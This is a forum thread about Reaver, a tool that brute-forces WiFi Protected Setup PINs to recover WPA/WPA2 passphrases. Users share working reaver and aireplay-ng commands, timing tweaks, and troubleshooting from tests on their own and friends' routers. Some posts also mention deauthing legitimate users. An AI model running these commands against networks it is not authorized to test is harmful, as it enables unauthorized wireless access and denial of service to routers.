Jump to content

Reaver Brute Force Attack Tool Cracking:


Infiltrator

Recommended Posts

The WiFi Protected Setup protocol is vulnerable to a brute force attack that allows an attacker to recover an access point’s WPS pin, and subsequently the WPA/WPA2 passphrase, in just a matter of hours.

Reaver is a WPA attack tool developed by Tactical Network Solutions that exploits a protocol design flaw in WiFi Protected Setup (WPS). This vulnerability exposes a side-channel attack against Wi-Fi Protected Access (WPA) versions 1 and 2 allowing the extraction of the Pre-Shared Key (PSK) used to secure the network. With a well-chosen PSK, the WPA and WPA2 security protocols are assumed to be secure by a majority of the 802.11 security community.

Usage is simple just specify the target BSSID and the monitor mode interface to use:

# reaver -i mon0 -b 00:01:02:03:04:05

Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.

WPS allows users to enter an 8 digit PIN to connect to a secured network without having to enter a passphrase. When a user supplies the correct PIN the access point essentially gives the user the WPA/WPA2 PSK that is needed to connect to the network. Reaver will determine an access point's PIN and then extract the PSK and give it to the attacker.

Web source: http://thehackernews.com/2011/12/reaver-brute-force-attack-tool-cracking.html

Link to comment
Share on other sites

The WiFi Protected Setup protocol is vulnerable to a brute force attack that allows an attacker to recover an access point’s WPS pin, and subsequently the WPA/WPA2 passphrase, in just a matter of hours.

Reaver is a WPA attack tool developed by Tactical Network Solutions that exploits a protocol design flaw in WiFi Protected Setup (WPS). This vulnerability exposes a side-channel attack against Wi-Fi Protected Access (WPA) versions 1 and 2 allowing the extraction of the Pre-Shared Key (PSK) used to secure the network. With a well-chosen PSK, the WPA and WPA2 security protocols are assumed to be secure by a majority of the 802.11 security community.

Usage is simple just specify the target BSSID and the monitor mode interface to use:

# reaver -i mon0 -b 00:01:02:03:04:05

Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.

WPS allows users to enter an 8 digit PIN to connect to a secured network without having to enter a passphrase. When a user supplies the correct PIN the access point essentially gives the user the WPA/WPA2 PSK that is needed to connect to the network. Reaver will determine an access point's PIN and then extract the PSK and give it to the attacker.

Web source: http://thehackernews.com/2011/12/reaver-brute-force-attack-tool-cracking.html

Anyone else trying this out and want to bounce some ideas around? I've been trying to successfully crack my test WAP here in my basement, to no avail. Either reaver just stops working after some random point, for example:

[!] WARNING: Receive timeout occurred

[+] 21.40% complete @ 12 seconds/attempt

[+] Trying pin 98060122

[!] WARNING: Receive timeout occurred

[+] Trying pin 98060122

...and then it will just hang there for hours/days/weeks if I let it. OR it will bomb out repeating

[!] WARNING: Receive timeout occurred

[!] WARNING: Receive timeout occurred

[!] WARNING: Receive timeout occurred

[!] WARNING: Receive timeout occurred

[!] WARNING: Receive timeout occurred

[!] WARNING: Receive timeout occurred

...over and over again. I've messed with the -t and -d operators, but nothing conclusive. Putting -t to 3 or 4 seems to really expand the lifespan of the attack, and -d 0 seems to speed things up quite a bit, but they always end up failing before it reaches 100%. Any ideas would be greatly appreciated, as any documentation or anything at all really regarding this tool, is pretty sparse. Thanks for starting this thread Infiltrator - the tool really is pretty sweet...especially if I could get it working!

PS: I'm rocking BT5R1 with the latest reaver beta 1.3 on a alfa realtek8180.

telot

Link to comment
Share on other sites

roughly, how long did it take you to get to 21% ?

It happened sometime in the middle of the night last night. I started around 5pm, so roughly 4 to 12 hours. That was with a 10 second delay (-d 10).

Thanks in advance if you have any insight Vodmya!

telot

Link to comment
Share on other sites

It happened sometime in the middle of the night last night. I started around 5pm, so roughly 4 to 12 hours. That was with a 10 second delay (-d 10).

Thanks in advance if you have any insight Vodmya!

telot

When this happened to me it was DoS-ing my router and put my router in a boot loop till i stopped it this attack has been know to DoS some routers

Link to comment
Share on other sites

When this happened to me it was DoS-ing my router and put my router in a boot loop till i stopped it this attack has been know to DoS some routers

telot you are using an un supported driver see here for compatible driver

Link to comment
Share on other sites

Have you guys configured your AP to work with WPS. If its only using the normal security WPA 2 Personal + AES or PSK not going to work. It needs to be configured with WPS if not, Reaver is not going to be effective.

Link to comment
Share on other sites

roughly, how long did it take you to get to 21% ?

According the the Reaver creator, it should not take more than 10 hours to recover the password, if its taking way longer than there must be something wrong.

Link to comment
Share on other sites

According the the Reaver creator, it should not take more than 10 hours to recover the password, if its taking way longer than there must be something wrong.

I'm using the rtl8187 driver for the alfa usb 036H. The router I'm using is a crappy old WNDR2000 with WPS enabled. I'm thinking its something option in my command.

sudo ./reaver -i mon0 -b XX:XX:XX:XX:XX -t 3 -d 10 -vv

Anything in that command stand out as totally wrong? I've modified the -t to 4 and 5, and changed the -d from 0 to 15.

And about the DoS'ing the router - I'm pretty sure that is what is happening. The router does NOT function as normal until I reset it (sometimes it requires pushing in the Full Restore hard reset button). Is this avoidable through the above operators (-d and -t)? I read somewhere (frantically searching for link, but cannot find it) that reaver can break crappier (slow, old, cheap) routers, but more robust routers handle the PIN trials just fine. Have any of you got it work on certain routers but not others?

I agree with Bobbyb - this could be the exploit of the year/decade if it works out, particularly for us wifi scoundrels. Thanks for your comments thus far, and for any further insight you can share.

telot

Link to comment
Share on other sites

This is a step in the right direction but will most likely fail against cheap/older routers that will just crap themselves and lock up requiring a hard reset. Also remember not everyone will enable or press their wps button on their routers. If I get time this weekend I will try it on a mid-range Netgear 3500 this weekend.

Link to comment
Share on other sites

Few things here. Though i haven't had much time to test but this can all be found online:

1) reaver has a feature to stop an attack and continue later (apparently you need to save the session somehow, though it might save itself?)

2) from arstechnica's review on it "The attack took about six hours to properly guess the PIN and return the SSID and password for the target network. During that time, the router locked up once under load, as I was putting normal levels of network traffic through it from other devices. Some routers will also lock out WPS requests for five minutes or so when they detect multiple failed PIN submissions—mine stopped responding occasionally, generating a string of warnings, but Reaver picked back up where it left off once the Linksys started responding again."

3) there is a new version (1.3) which apparently is a little faster (save a few minutes? lol), but it also includes a program called walsh to scan and detect devices which are exploitable - i can't get walsh to find anything on my system... =(

i'll have more time to play with it later but im sure there are still lots of bugs being worked out.

Also, there is another script which is apparently faster then reaver ... (once again, haven't tried it yet...)

good luck and hopefully in the coming days we can figure out things a bit more!

btw, this is my first post and i love hak5 =)

Link to comment
Share on other sites

1. That session resume feature is included only in the commercial version. Which I just read (but havent confirmed) that the source for the commercial is now available as well. I'll give it a shot asap

2. So ars reset the router when needed? I guess if your attack wasn't working and there were other (legitimate) users on the access point, you could deauth them off with aireplay -0, though I'm not sure how the deauth would effect the reaver. If they a legit user was deauth'd for long enough, eventually the AP would get reset. Not sure how many times that will work though, and vastly increases the risk. So no reaver'ing after hours if thats the case.

3. 1.3 beta is what I have at the moment - I'll check to see if theres any updates when I get home (mobile right now). Fingers crossed!

I agree, they are definitely working out the bugs, as reaver is hot off the presses. Its exciting to be using cutting edge tools though, gotta say.

telot

Link to comment
Share on other sites

Yes, this is only for WPS Pins. I had a vulnerable Buffalo running DD-WRT. After disabling all WPS related options (also called AOSS on Buffalo), the only way in was the 256bit WPA2 key.

Note:I did not run the tool, just changed the settings so that WPS wasn't an option that was offered when connecting.

PD

Link to comment
Share on other sites

the newest version (not in download section, download the svn) is v1.4 (type "svn checkout http://reaver-wps.googlecode.com/svn/trunk/") - configure/make/make install it - you need make install as it creates a folder and stuff for the sessions.

this version i can confirm saves sessions and restores them. its all automatic.. start reaver again and it asks if you want to continue..

also, before this svn, reaver and walsh didn't work for me. now it appears to be working... will let you know in 10 hr... unless my computer/the router crashes before then lol

Link to comment
Share on other sites

I have used Wash to see how many APs are vulnerable. Most of my nearby APs at home and at work is Apple Airport Extreme and they seem to be safe... But there is a lot of vulnerable wifi out there. Tried reaver at two of my friends houses and both of them took about 7-8 hours to retrieve the key. They will now disable WPS. ;)

Version 1.4 via svn is to prefer thou. Had a bunch of strange errors before i went to the beta-version...

Link to comment
Share on other sites

This is really fascinating. I didn't know this post would get this so many replies.

Link to comment
Share on other sites

Finally tried 1.3 over the weekend and didn't have much success. Too many receiving timeouts etc and patience wasn't my virtue. This ver did support resume. Couldn't get Wash to run properly (can get the WPS info out of the packets anyway using wireshark). Just installed 1.4. (110) of Reaver. Wash is running perfect and am just tweaking the timing and delays to find the sweet spot with my AP. Looks very promising. Impressed I am :-)

Link to comment
Share on other sites

This is really fascinating. I didn't know this post would get this so many replies

Maybe because your topic was mentioned WPA in 10 minutes... that gets everybody's attention :D

Have to admnit this is a scary flaw indeed, I have been doing some checking and there are

a LOT of vulnerable routers as far as Walsh / Wash is showing..

When this tool first came out I thought I wouldn't be in trouble as router did not have WPS configured..

but oohhh yes I was !!

http://adaywithtape.blogspot.com/2012/01/cracking-wpa-using-wps-vulnerability.html

By the way, I am having trouble with the v1.4, Wash works great, however when running reaver it

seems to have problems associating..

Is there any limitation on that read only download ?

v1.3 works fine, so I am a little confused...

Edited by TAPE
Link to comment
Share on other sites

Been testing with 1.4 and am having a much better go with it. Timeouts/locks (varies by vendor) still occur but the resume feature makes up for potential lost time. Once it finds the 1st four digits its generally pretty quick after that. Some of the older routers are still using default pins and they take about 5 secs to crack. Even though I knew it was only a matter of time I was still kinda dumbstruck when the app spit my password out at me since I never expected to see it done so easily (even with various mutations this was a password that was not supposed to be presented in this manner ;-). This has been a valuable "hands on" week with Wireshark as well. Looking for a filter for WPS? try wlan_mgt.wfa.ie.type == 0x04

Link to comment
Share on other sites

Been testing with 1.4 and am having a much better go with it. Timeouts/locks (varies by vendor) still occur but the resume feature makes up for potential lost time. Once it finds the 1st four digits its generally pretty quick after that. Some of the older routers are still using default pins and they take about 5 secs to crack. Even though I knew it was only a matter of time I was still kinda dumbstruck when the app spit my password out at me since I never expected to see it done so easily (even with various mutations this was a password that was not supposed to be presented in this manner ;-). This has been a valuable "hands on" week with Wireshark as well. Looking for a filter for WPS? try wlan_mgt.wfa.ie.type == 0x04

Thanks very much for posting your research Vodmya. You motivated me to pick it up again (especially now that resumes working well! woo!). Did you happen to record which settings (I imagine -d and -t?) worked for which router models? Thanks again man

telot

Link to comment
Share on other sites

I just wanted to revert on the issues I have/had been experiencing with reaver v1.4

As previously mentioned reaver v1.3 was/is working fine on my test setup, however

v1.4 failed to associate each and every time, no matter what I tried.

I managed to bypass that issue by associating to the AP with aireplay-ng and

then using the -A switch when running reaver v1.4 ;

So first running the aireplay-ng fake auth on the router ;

 
mon0 aireplay-ng mon0 -1 120 -a 98:FC:11:8E:0E:9C -e FUBAR

then running reaver with the -A switch ;

 
reaver -i mon0 -A -b 98:FC:11:8E:0E:9C -v

That resulted in much better results !

updated blogpost ;

http://adaywithtape.blogspot.com/2012/01/cracking-wpa-using-wps-vulnerability.html

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...